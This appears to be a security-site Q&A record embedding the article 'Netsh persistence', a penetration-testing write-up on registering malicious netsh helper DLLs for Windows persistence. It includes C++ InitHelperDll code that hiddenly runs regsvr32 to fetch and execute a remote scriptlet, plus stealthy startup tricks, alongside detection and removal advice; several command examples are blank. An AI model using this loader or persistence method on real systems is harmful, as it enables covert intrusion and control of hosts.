[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyLwuJZ5cc_FlavvP8lnLp_s8qF7Mw1CW8rKG6sQ4YVw":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},89,"How can an attacker trigger the malicious DLL without directly running netsh?","Since some VPN software and system processes call netsh during startup, the attacker's DLL will be loaded automatically when those programs invoke netsh. Alternatively, the attacker can add netsh to startup items—only `netsh.exe` appears in the list, making it deceptive. This strategy is akin to using [Use Logon Scripts to maintain persistence](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence) where legitimate scripts are abused.","\u003Cp>Since some VPN software and system processes call netsh during startup, the attacker&#39;s DLL will be loaded automatically when those programs invoke netsh. Alternatively, the attacker can add netsh to startup items—only `netsh.exe` appears in the list, making it deceptive. This strategy is akin to using [Use Logon Scripts to maintain persistence](\u002Fnews\u002Fuse-logon-scripts-to-maintain-persistence) where legitimate scripts are abused.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fnetsh-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-trigger-the-malicious-dll-without-directly-running-netsh-1777485281704","persistence, trigger, VPN, startup, netsh.exe, deception",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},23,"Netsh persistence","netsh-persistence","Learn how attackers use netsh to execute malicious DLLs for persistence. Includes DLL writing, exploitation, and detection methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Cp>\u003Cstrong>About:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Common commands of netsh\u003C\u002Fli>\u003Cli>Matthew Demaske's method of using netshell to execute malicious DLLs and maintain persistence on a host\u003C\u002Fli>\u003Cli>Write a DLL with the InitHelperDll function\u003C\u002Fli>\u003Cli>How to use\u003C\u002Fli>\u003Cli>Detection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Table of Contents:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to common commands of netsh\u003C\u002Fli>\u003Cli>Testing Matthew Demaske's shared method—using netshell to execute malicious DLLs and maintain persistence on a host\u003C\u002Fli>\u003Cli>How to write a helper DLL in C++ with the export function InitHelperDll\u003C\u002Fli>\u003Cli>Practical exploitation testing\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.adaptforward.com\u002F2016\u002F09\u002Fusing-netshell-to-execute-evil-dlls-and-persist-on-a-host\u002F\u003C\u002Fp>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, using commands natively supported by the system can often bypass various detections and interceptions. For example, in my article 'Use bitsadmin to maintain persistence and bypass Autoruns', I introduced how to leverage the system's native bitsadmin tool to achieve persistence and evade detection by Autoruns.\u003C\u002Fp>\u003Cp>Matthew Demaske recently shared a method he discovered, which similarly utilizes commands natively supported by the system—using netshell to execute evil DLLs and persist on a host. This article will organize his method and supplement the DLL writing techniques not covered in detail in the original post.\u003C\u002Fp>\u003Ch2>0x01 Introduction to netsh\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Netsh is a powerful network configuration command-line tool provided by the Windows operating system. Common commands include:\u003C\u002Fp>\u003Cp>View IP configuration information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>View network configuration files:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Enable\u002Fdisable network adapters:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View all TCP connections:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Set local IP, subnet mask, and gateway IP:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Check firewall status:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Enable\u002Fdisable firewall:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>Enter 'netsh \u002F?' to view more detailed command help. Notably, the 'add' command is worth attention. Enter 'netsh add \u002F?' for more details:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>netsh add \u002F?\u003C\u002Fp>\u003Cp>The following commands are available:\u003C\u002Fp>\u003Cp>Commands in this context:\u003C\u002Fp>\u003Cp>add helper - Installs a helper DLL.\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>What would happen if we add a test DLL here?\u003Cbr>\u003Cbr>\u003Cbr>## 0x02 Writing a Helper DLL\u003Cbr>---\u003Cbr>Each helper DLL must contain an exported function named InitHelperDll\u003Cbr>\u003Cbr>After adding the helper DLL, netsh will call the exported function InitHelperDll in the helper DLL each time it initializes during loading\u003Cbr>\u003Cbr>Example of InitHelperDll:\u003Cbr>\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>DWORD\u003C\u002Fp>\u003Cp>WINAPI\u003C\u002Fp>\u003Cp>InitHelperDll(\u003C\u002Fp>\u003Cp>DWORD      dwNetshVersion,\u003C\u002Fp>\u003Cp>PVOID      pReserved\u003C\u002Fp>\u003Cp>)\u003C\u002Fp>\u003Cp>{\u003C\u002Fp>\u003Cp>NS_HELPER_ATTRIBUTES attMyAttributes;\u003C\u002Fp>\u003Cp>attMyAttributes.guidHelper = g_MyGuid;\u003C\u002Fp>\u003Cp>attMyAttributes.dwVersion  = 1;\u003C\u002Fp>\u003Cp>attMyAttributes.pfnStart   = NetshStartHelper;\u003C\u002Fp>\u003Cp>RegisterHelper( NULL, &amp;attMyAttributes );\u003C\u002Fp>\u003Cp>return NO_ERROR;\u003C\u002Fp>\u003Cp>}\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>\u003Cbr>For details on InitHelperDll, refer to the following link:\u003Cbr>\u003Cbr>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwindows\u002Fdesktop\u002Fms708327(v=vs.85).aspx\u003Cbr>\u003Cbr>\u003Cbr>The article 'Code Execution of Regsvr32.exe' previously covered how to add an export function to a DLL, so here is a brief continuation:\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>Create a new C++ project, set up a DLL project, and add to the main file:\u003Cbr>\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>DWORD WINAPI InitHelperDll(DWORD dwNetshVersion,PVOID pReserved)\u003C\u002Fp>\u003Cp>{\u003C\u002Fp>\u003Cp>char *command=\"cmd.exe \u002Fc start regsvr32.exe \u002Fs \u002Fn \u002Fu \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\";\u003C\u002Fp>\u003Cp>WinExec(command,SW_HIDE);\u003C\u002Fp>\u003Cp>return 0;\u003C\u002Fp>\u003Cp>}\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Add export function declaration:\u003Cbr>\u003Cbr>File type:\u003Cbr>\u003Cbr>Text File\u003Cbr>\u003Cbr>Name:\u003Cbr>\u003Cbr>Same name file.def\u003Cbr>\u003Cbr>\u003Cbr>Write\u003Cbr>\u003Cbr>EXPORTS\u003Cbr>InitHelperDll\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>Compile then\u003Cbr>\u003Cbr>**Note:**\u003Cbr>\u003Cbr>Marc Smeets shared his POC code, defining export functions using another method:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>extern \"C\" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>The payload creates a new thread to execute shellcode\u003Cbr>\u003Cbr>**Project repository is as follows:**\u003Cbr>\u003Cbr>https:\u002F\u002Fgithub.com\u002Foutflankbv\u002FNetshHelperBeacon\u003Cbr>\u003Cbr>\u003Cbr>## 0x03 Adding a custom helper DLL\u003Cbr>---\u003Cbr>**Note:**\u003Cbr>\u003Cbr>Administrator privileges are required\u003Cbr>\u003Cbr>Add via cmd:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019796536_0_af6f1f7df0.png\">\u003C\u002Fp>\u003Cp>As shown below, registry keys are created synchronously\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019805910_1_2a13bb1566.jpeg\">\u003C\u002Fp>\u003Cp>Location: ``HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh\u003C\u002Fp>\u003Cp>Name: ``netshtest\u003C\u002Fp>\u003Cp>Type: ``REG_SZ\u003C\u002Fp>\u003Cp>Data: ``c:\\test\\netshtest.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Adding key-value directly via registry has the same effect as adding helper dll via netsh add\u003C\u002Fp>\u003Ch2>0x04 Trigger backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After helper dll is successfully added, c:\\test\\netshtest.dll will be loaded every time netsh is called\u003C\u002Fp>\u003Cp>As shown in the figure, running netsh command loads c:\\test\\netshtest.dll and launches calculator\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019821120_2_7841f858e5.png\">\u003C\u002Fp>\u003Cp>Verification:\u003C\u002Fp>\u003Cul>\u003Cli>Use Process Explorer to view dlls loaded by netsh process\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019831572_3_aff3185480.png\">\u003C\u002Fp>\u003Cul>\u003Cli>Can also be viewed in Event Properties of process attributes using Process Monitor\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019852899_4_5310ab78bd.png\">\u003C\u002Fp>\u003Ch2>0x05 Persistence\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Since netsh is a commonly used system command, there is a probability that it will be used normally by users, so simply launching netsh can trigger the payload.\u003C\u002Fli>\u003Cli>If added as a common startup item, it is also quite deceptive because only netsh.exe is displayed as starting.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x06 Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor the registry location: ``HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh``\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>The `netsh show helper` command cannot detect newly added helper DLLs.\u003C\u002Fli>\u003Cli>Be aware of whether normal DLLs in the registry have been replaced.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Removal\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Via cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Via registry:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>The prerequisite for Netsh Persistence is that administrator privileges have already been obtained.\u003C\u002Fli>\u003Cli>Some VPN software calls the netsh command during startup, which solves the self-starting issue of Netsh Persistence. This method is worth testing.\u003C\u002Fli>\u003Cli>If netsh is found in the startup items, it is worth noting, and it is necessary to check whether the corresponding registry key contains malicious helper DLLs.\u003C\u002Fli>\u003Cli>The default key values under the registry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh differ across systems, requiring comparison to determine if the default key values have been tampered with.\u003C\u002Fli>\u003C\u002Ful>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Cp>\u003Cstrong>About:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Common commands of netsh\u003C\u002Fli>\u003Cli>Matthew Demaske's method of using netshell to execute malicious DLLs and maintain persistence on a host\u003C\u002Fli>\u003Cli>Write a DLL with the InitHelperDll function\u003C\u002Fli>\u003Cli>How to use\u003C\u002Fli>\u003Cli>Detection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Table of Contents:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to common commands of netsh\u003C\u002Fli>\u003Cli>Testing Matthew Demaske's shared method—using netshell to execute malicious DLLs and maintain persistence on a host\u003C\u002Fli>\u003Cli>How to write a helper DLL in C++ with the export function InitHelperDll\u003C\u002Fli>\u003Cli>Practical exploitation testing\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.adaptforward.com\u002F2016\u002F09\u002Fusing-netshell-to-execute-evil-dlls-and-persist-on-a-host\u002F\u003C\u002Fp>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, using commands natively supported by the system can often bypass various detections and interceptions. For example, in my article 'Use bitsadmin to maintain persistence and bypass Autoruns', I introduced how to leverage the system's native bitsadmin tool to achieve persistence and evade detection by Autoruns.\u003C\u002Fp>\u003Cp>Matthew Demaske recently shared a method he discovered, which similarly utilizes commands natively supported by the system—using netshell to execute evil DLLs and persist on a host. This article will organize his method and supplement the DLL writing techniques not covered in detail in the original post.\u003C\u002Fp>\u003Ch2>0x01 Introduction to netsh\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Netsh is a powerful network configuration command-line tool provided by the Windows operating system. Common commands include:\u003C\u002Fp>\u003Cp>View IP configuration information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>View network configuration files:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Enable\u002Fdisable network adapters:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View all TCP connections:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Set local IP, subnet mask, and gateway IP:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Check firewall status:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Enable\u002Fdisable firewall:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>Enter 'netsh \u002F?' to view more detailed command help. Notably, the 'add' command is worth attention. Enter 'netsh add \u002F?' for more details:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>netsh add \u002F?\u003C\u002Fp>\u003Cp>The following commands are available:\u003C\u002Fp>\u003Cp>Commands in this context:\u003C\u002Fp>\u003Cp>add helper - Installs a helper DLL.\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>What would happen if we add a test DLL here?\u003Cbr>\u003Cbr>\u003Cbr>## 0x02 Writing a Helper DLL\u003Cbr>---\u003Cbr>Each helper DLL must contain an exported function named InitHelperDll\u003Cbr>\u003Cbr>After adding the helper DLL, netsh will call the exported function InitHelperDll in the helper DLL each time it initializes during loading\u003Cbr>\u003Cbr>Example of InitHelperDll:\u003Cbr>\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>DWORD\u003C\u002Fp>\u003Cp>WINAPI\u003C\u002Fp>\u003Cp>InitHelperDll(\u003C\u002Fp>\u003Cp>DWORD      dwNetshVersion,\u003C\u002Fp>\u003Cp>PVOID      pReserved\u003C\u002Fp>\u003Cp>)\u003C\u002Fp>\u003Cp>{\u003C\u002Fp>\u003Cp>NS_HELPER_ATTRIBUTES attMyAttributes;\u003C\u002Fp>\u003Cp>attMyAttributes.guidHelper = g_MyGuid;\u003C\u002Fp>\u003Cp>attMyAttributes.dwVersion  = 1;\u003C\u002Fp>\u003Cp>attMyAttributes.pfnStart   = NetshStartHelper;\u003C\u002Fp>\u003Cp>RegisterHelper( NULL, &amp;attMyAttributes );\u003C\u002Fp>\u003Cp>return NO_ERROR;\u003C\u002Fp>\u003Cp>}\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>\u003Cbr>For details on InitHelperDll, refer to the following link:\u003Cbr>\u003Cbr>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwindows\u002Fdesktop\u002Fms708327(v=vs.85).aspx\u003Cbr>\u003Cbr>\u003Cbr>The article 'Code Execution of Regsvr32.exe' previously covered how to add an export function to a DLL, so here is a brief continuation:\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>Create a new C++ project, set up a DLL project, and add to the main file:\u003Cbr>\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>DWORD WINAPI InitHelperDll(DWORD dwNetshVersion,PVOID pReserved)\u003C\u002Fp>\u003Cp>{\u003C\u002Fp>\u003Cp>char *command=\"cmd.exe \u002Fc start regsvr32.exe \u002Fs \u002Fn \u002Fu \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\";\u003C\u002Fp>\u003Cp>WinExec(command,SW_HIDE);\u003C\u002Fp>\u003Cp>return 0;\u003C\u002Fp>\u003Cp>}\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Add export function declaration:\u003Cbr>\u003Cbr>File type:\u003Cbr>\u003Cbr>Text File\u003Cbr>\u003Cbr>Name:\u003Cbr>\u003Cbr>Same name file.def\u003Cbr>\u003Cbr>\u003Cbr>Write\u003Cbr>\u003Cbr>EXPORTS\u003Cbr>InitHelperDll\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>Compile then\u003Cbr>\u003Cbr>**Note:**\u003Cbr>\u003Cbr>Marc Smeets shared his POC code, defining export functions using another method:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>extern \"C\" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>The payload creates a new thread to execute shellcode\u003Cbr>\u003Cbr>**Project repository is as follows:**\u003Cbr>\u003Cbr>https:\u002F\u002Fgithub.com\u002Foutflankbv\u002FNetshHelperBeacon\u003Cbr>\u003Cbr>\u003Cbr>## 0x03 Adding a custom helper DLL\u003Cbr>---\u003Cbr>**Note:**\u003Cbr>\u003Cbr>Administrator privileges are required\u003Cbr>\u003Cbr>Add via cmd:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019796536_0_af6f1f7df0-1.png\">\u003C\u002Fp>\u003Cp>As shown below, registry keys are created synchronously\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019805910_1_2a13bb1566-1.jpeg\">\u003C\u002Fp>\u003Cp>Location: ``HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh\u003C\u002Fp>\u003Cp>Name: ``netshtest\u003C\u002Fp>\u003Cp>Type: ``REG_SZ\u003C\u002Fp>\u003Cp>Data: ``c:\\test\\netshtest.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Adding key-value directly via registry has the same effect as adding helper dll via netsh add\u003C\u002Fp>\u003Ch2>0x04 Trigger backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After helper dll is successfully added, c:\\test\\netshtest.dll will be loaded every time netsh is called\u003C\u002Fp>\u003Cp>As shown in the figure, running netsh command loads c:\\test\\netshtest.dll and launches calculator\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019821120_2_7841f858e5-1.png\">\u003C\u002Fp>\u003Cp>Verification:\u003C\u002Fp>\u003Cul>\u003Cli>Use Process Explorer to view dlls loaded by netsh process\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019831572_3_aff3185480-1.png\">\u003C\u002Fp>\u003Cul>\u003Cli>Can also be viewed in Event Properties of process attributes using Process Monitor\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019852899_4_5310ab78bd-1.png\">\u003C\u002Fp>\u003Ch2>0x05 Persistence\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Since netsh is a commonly used system command, there is a probability that it will be used normally by users, so simply launching netsh can trigger the payload.\u003C\u002Fli>\u003Cli>If added as a common startup item, it is also quite deceptive because only netsh.exe is displayed as starting.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x06 Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor the registry location: ``HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh``\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>The `netsh show helper` command cannot detect newly added helper DLLs.\u003C\u002Fli>\u003Cli>Be aware of whether normal DLLs in the registry have been replaced.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Removal\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Via cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Via registry:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>The prerequisite for Netsh Persistence is that administrator privileges have already been obtained.\u003C\u002Fli>\u003Cli>Some VPN software calls the netsh command during startup, which solves the self-starting issue of Netsh Persistence. This method is worth testing.\u003C\u002Fli>\u003Cli>If netsh is found in the startup items, it is worth noting, and it is necessary to check whether the corresponding registry key contains malicious helper DLLs.\u003C\u002Fli>\u003Cli>The default key values under the registry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh differ across systems, requiring comparison to determine if the default key values have been tampered with.\u003C\u002Fli>\u003C\u002Ful>\u003C\u002Fbody>\u003C\u002Fhtml>",1731,"Onedaysec",4,"published","2026-02-02T08:20:05.024Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Netsh Persistence: Execute Malicious DLLs & Maintain Host Access","netsh persistence, malicious DLL, InitHelperDll, netshell, Windows backdoor, detection, defense, C++ DLL, Matthew Demaske",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],90,88,87,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.519Z","2026-07-23T16:00:59.286Z","draft","2026-07-23T16:03:30.489Z"]